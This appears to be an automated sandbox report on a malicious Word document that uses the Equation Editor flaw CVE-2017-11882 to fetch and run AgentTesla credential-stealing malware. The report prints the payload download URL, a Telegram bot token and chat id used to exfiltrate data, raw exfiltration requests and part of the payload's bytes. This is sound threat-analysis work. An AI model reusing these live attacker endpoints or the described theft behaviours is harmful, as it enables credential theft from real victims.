Play interactive tour

Edit tour

Windows Analysis Report PO141021.doc

Overview

General Information

Sample Name:	PO141021.doc
Analysis ID:	502705
MD5:	9095b4b704c9f1ef75cc683b57e1f207
SHA1:	d88b99fc3fff5eac59d7fedd136fd467f1c17106
SHA256:	10df15707ce5a8b457ebccab5f4a5c3b2548ea755bc11666f5601583677f17b5
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected AgentTesla

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Binary or sample is protected by dotNetProtector

Injects a PE file into a foreign processes

Office equation editor drops PE file

Machine Learning detection for dropped file

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to launch a process as a different user

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2252 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 1500 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

godsawqop.exe (PID: 2692 cmdline: C:\Users\user\AppData\Roaming\godsawqop.exe MD5: D1BAA9515F4C67A7B561938BBD81BC75)

godsawqop.exe (PID: 2236 cmdline: C:\Users\user\AppData\Roaming\godsawqop.exe MD5: D1BAA9515F4C67A7B561938BBD81BC75)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1991797369", "Chat URL": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: godsawqop.exe PID: 2692	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: godsawqop.exe PID: 2236	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: godsawqop.exe PID: 2236	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: godsawqop.exe PID: 2236	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.godsawqop.exe.32ea110.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.32ea110.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.3320330.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.3320330.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.3320330.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.3320330.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.32ea110.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.godsawqop.exe.32ea110.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.godsawqop.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.godsawqop.exe.400000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 5 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 95.216.94.72, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1500, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1500, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\godsawqop.exe, CommandLine: C:\Users\user\AppData\Roaming\godsawqop.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\godsawqop.exe, NewProcessName: C:\Users\user\AppData\Roaming\godsawqop.exe, OriginalFileName: C:\Users\user\AppData\Roaming\godsawqop.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1500, ProcessCommandLine: C:\Users\user\AppData\Roaming\godsawqop.exe, ProcessId: 2692

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.2.godsawqop.exe.400000.1.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1991797369", "Chat URL": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument"}
Source: godsawqop.exe.2692.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendMessage"}

Multi AV Scanner detection for submitted file

Show sources

Source: PO141021.doc

Virustotal: Detection: 39%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: http://milkhost.ru/trasper/goshcj.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: milkhost.ru

Virustotal: Detection: 7%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: global traffic

DNS query: name: milkhost.ru

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 95.216.94.72:80

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

Networking:

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: global traffic

HTTP traffic detected: POST /bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f2463ef5aa5Host: api.telegram.orgContent-Length: 1023Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Oct 2021 08:34:58 GMTContent-Type: application/x-msdownloadContent-Length: 486912Connection: keep-aliveLast-Modified: Thu, 14 Oct 2021 01:52:01 GMTExpires: Mon, 13 Dec 2021 08:34:58 GMTCache-Control: max-age=5184000Pragma: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 8c 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 c9 1f 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 73 07 00 57 00 00 00 00 80 07 00 d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 a4 06 00 00 cf 00 00 02 00 00 00 5c 00 00 06 04 42 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 09 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 06 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 09 01 00 06 72 4b 48 00 70 7e 3d 00 00 04 02 28 09 01 00 06 28 11 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 fe 00 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 09 01 00 06 7

Source: global traffic

HTTP traffic detected: GET /trasper/goshcj.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milkhost.ruConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443

Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: godsawqop.exe, 00000005.00000002.724989043.0000000002633000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: godsawqop.exe, 00000005.00000002.725093065.000000000499B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	String found in binary or memory: http://mZWVLr.com
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: godsawqop.exe, 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp	String found in binary or memory: https://4hCltxiPdhpdC.com
Source: godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/
Source: godsawqop.exe, 00000005.00000002.724184931.000000000064E000.00000004.00000020.sdmp, godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument
Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocumentdocument-----
Source: godsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgP
Source: godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0008E59B-A89A-4382-AC7E-24705A8EB889}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: milkhost.ru

Source: global traffic

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\godsawqop.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_002D3687	4_2_002D3687
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_002D8EF0	4_2_002D8EF0
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00481010	4_2_00481010
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_004F0048	4_2_004F0048
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_004F5680	4_2_004F5680
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00505A40	4_2_00505A40
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00500048	4_2_00500048
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_005173BF	4_2_005173BF
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00510048	4_2_00510048
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_006A0048	4_2_006A0048
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_008072B7	4_2_008072B7
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_00801BCD	4_2_00801BCD
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 4_2_0080B81F	4_2_0080B81F
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_002D6048	5_2_002D6048
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_002D5430	5_2_002D5430
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_002DF510	5_2_002DF510
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_002D5778	5_2_002D5778
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_002D2197	5_2_002D2197
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_002DECC0	5_2_002DECC0
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_0086E888	5_2_0086E888
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_00864618	5_2_00864618
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_00867828	5_2_00867828
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_0086AF68	5_2_0086AF68
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_008618AC	5_2_008618AC
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_008618B8	5_2_008618B8
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_00866A10	5_2_00866A10
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Code function: 5_2_0086B538	5_2_0086B538

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Code function: 4_2_00485FF0 CreateProcessAsUserW,

4_2_00485FF0

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Code function: 4_2_004F0048 ShipAssert,NtOpenResourceManager,

4_2_004F0048

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: PO141021.doc

Virustotal: Detection: 39%

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Process created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$141021.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD049.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@6/9@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\godsawqop.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: goshcj[1].exe.2.dr, ReadTargetFrameworkId.cs	Base64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
Source: godsawqop.exe.2.dr, ReadTargetFrameworkId.cs	Base64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
